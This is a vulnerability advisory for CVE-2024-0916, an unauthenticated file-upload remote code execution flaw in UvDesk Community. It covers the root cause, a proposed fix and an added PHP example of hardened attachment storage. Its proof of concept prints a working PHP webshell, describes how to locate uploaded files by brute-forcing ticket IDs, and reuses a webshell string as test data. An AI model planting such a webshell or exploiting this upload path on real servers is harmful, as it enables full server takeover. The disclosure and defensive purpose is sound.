Unauthenticated Remote Code Execution in UvDesk Community

Apr 25, 2024

CVE Number

CVE-2024-0916

Credits

Melvin Mejia of Pentraze Cybersecurity

Summary

An insecure file upload vulnerability has been found in UvDesk Community version 1.1.3 and prior. The issue resides in the ticket creation process, which allows files to be uploaded as attachments: the uploaded files are not sanitized, and they are stored in a path that is accessible to unauthenticated users.

CVSS

10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Details

During ticket creation, users can attach files. The application neither verifies the type of the uploaded file nor sanitizes its name and extension. As a result, an uploaded file is stored under the web root and can be requested, and executed, through the URL pattern http://<host>/assets/threads/<ticket_id>/<uploaded_file>. The ticket ID needed to build this URL is sent to the submitter's email address when the ticket is created, and because ticket IDs are incremental it can also be found by simple brute force.

PoC

  • Vulnerable upload form: (screenshot, not reproduced in this text)

  • Contents of webshell.php:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
  • Demonstration of code execution: (screenshot, not reproduced in this text)

Root cause

The vulnerability comes from the following code in the UVdesk Core Framework; this is the function the support center bundle uses to store ticket attachments.

Ref to code: https://github.com/uvdesk/core-framework/blob/864b9ee35202d754d6fb0b73aa80ded749e015f0/FileSystem/UploadManagers/Localhost.php#L78C1-L78C102

The application already has a mechanism to sanitize filenames, but it is never used: the flag that enables it defaults to false (see the referenced code).

Proposed fix

In a test environment, changing that flag's value to true is enough to prevent code execution on the server: the filename is randomized and the .php extension is stripped from the file. Uploading the same example file webshell.php, this is what I end up with as an attachment: (screenshot, not reproduced in this text)

Requesting said file: (screenshot, not reproduced in this text)

Pull request with the proposed fix: github.com/uvdesk/core-framework/pull/706
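The insecure pattern described above beside a hardened storage path, as an added example that is neither UvDesk's code nor the code in the linked pull request. It assumes the assets/threads/<ticket_id>/ layout from the advisory; the function names, the extension allowlist and the constructed sample files are illustrative, and the type check uses PHP's fileinfo extension on the bytes actually written to disk rather than anything the client sends.

```php
<?php
declare(strict_types=1);

// Added example, not UvDesk code. Function names, ALLOWED_TYPES and the sample
// files are hypothetical; the assets/threads/<ticket_id>/<file> layout is the one
// the advisory describes.

// Allowlist: stored extension => MIME type the file contents must have.
const ALLOWED_TYPES = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
    'txt'  => 'text/plain',
];

/**
 * Insecure: the client-supplied name, extension included, becomes the path of a
 * file under a directory the web server executes PHP from. webshell.php is then
 * reachable as /assets/threads/<ticket_id>/webshell.php.
 */
function insecureAttachmentPath(string $root, int $ticketId, string $clientName): string
{
    return "$root/threads/$ticketId/$clientName";
}

/**
 * Hardened: the client name contributes nothing to the stored name. The last
 * extension must be allowlisted, the bytes on disk must match the MIME type
 * that extension promises, and the stored name is random.
 * Returns the storage path or throws on rejection.
 */
function secureAttachmentPath(string $root, int $ticketId, string $clientName, string $tmpPath): string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new InvalidArgumentException("extension '$ext' not allowed");
    }
    // Detect the type from file contents (libmagic), never from the client's Content-Type.
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath);
    if ($detected !== ALLOWED_TYPES[$ext]) {
        throw new InvalidArgumentException("content is $detected, not " . ALLOWED_TYPES[$ext]);
    }
    // 128-bit random name: unguessable even when the ticket ID is brute-forced,
    // and free of any double extension the client may have chosen.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    return "$root/threads/$ticketId/$name";
}

// Demo with constructed inputs: a bare PNG signature and a one-line PHP webshell.
$tmpPng = tempnam(sys_get_temp_dir(), 'att');
file_put_contents($tmpPng, "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16));
$tmpShell = tempnam(sys_get_temp_dir(), 'att');
file_put_contents($tmpShell, "<?php system(\$_REQUEST['cmd']); ?>");

echo "insecure: " . insecureAttachmentPath('assets', 42, 'webshell.php') . "\n";
echo "secure:   " . secureAttachmentPath('assets', 42, 'logo.png', $tmpPng) . "\n";
foreach (['webshell.php', 'webshell.png.php', 'webshell.php.png'] as $clientName) {
    try {
        secureAttachmentPath('assets', 42, $clientName, $tmpShell);
        echo "UNEXPECTED: $clientName accepted\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected $clientName: " . $e->getMessage() . "\n";
    }
}
unlink($tmpPng);
unlink($tmpShell);
```

Run it with the php CLI. Randomizing the name and discarding the client's extension is what removes the code-execution path, and it is the same effect the proposed fix achieves by enabling the existing sanitizer. It does not by itself change who can read the file: an attachment under assets/ stays reachable by anyone who can guess or brute-force the ticket ID, so storing attachments outside the document root (or in a directory where the server does not execute scripts) and serving them through an authenticated controller is the second layer a deployment should add.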
